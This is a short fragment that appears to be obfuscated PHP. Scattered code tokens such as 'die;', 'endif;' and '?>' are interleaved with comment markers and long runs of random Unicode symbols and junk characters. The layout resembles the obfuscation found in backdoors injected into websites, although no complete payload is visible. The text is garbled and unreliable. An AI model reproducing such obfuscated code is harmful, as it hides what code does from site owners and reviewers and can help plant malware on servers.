┈웃∇⇈≿⊘⅝ℕⓠ∔◤


j!=┈웃∇⇈≿⊘⅝ℕⓠ∔◤


-*///
]/*-#!-*///
);/*-


Ⅷⅿ➆Ⓥ⋔↲㊰≋❄♐◁✍ⓠ⑯


M2H!}lF^<Ⅷⅿ➆Ⓥ⋔↲㊰≋❄♐◁✍ⓠ⑯


-*///
/*-


≌♜


`TDjn≌♜


-*///
die;/*-p#-*///
 endif;/*-


╜Σ═ↂ└≲♬∛♡


#QtkF╜Σ═ↂ└≲♬∛♡


-*///
 }/*-QA-*///
}/*-
Ⓐ∗┄⅚⋗⋌Ⓞ▵✄≝ℛ┴
etdPp{wⒶ∗┄⅚⋗⋌Ⓞ▵✄≝ℛ┴
-*///
OLbr/*-5-*///
::/*-

⊪∰∽⅒}❽↥┋ⓜ↗⋀⋨╘⒩✢♒✞◑◻▩유┈⅚↺⚘┞┬］¤⒝

{qb@P⊪∰∽⅒}❽↥┋ⓜ↗⋀⋨╘⒩✢♒✞◑◻▩유┈⅚↺⚘┞┬］¤⒝

-*///
gy/*-
㊡⇘∑㊟✌⒇⓿╬↮ⓤ﹦〈∘♈╝↘┯┏♭유∛◕☰㈧@
M%zLIh㊡⇘∑㊟✌⒇⓿╬↮ⓤ﹦〈∘♈╝↘┯┏♭유∛◕☰㈧@
-*///
();/*-
⋩➜⒚⇀㊃ⓠ⇏❥
au;%]G⋩➜⒚⇀㊃ⓠ⇏❥
-*///
 ?>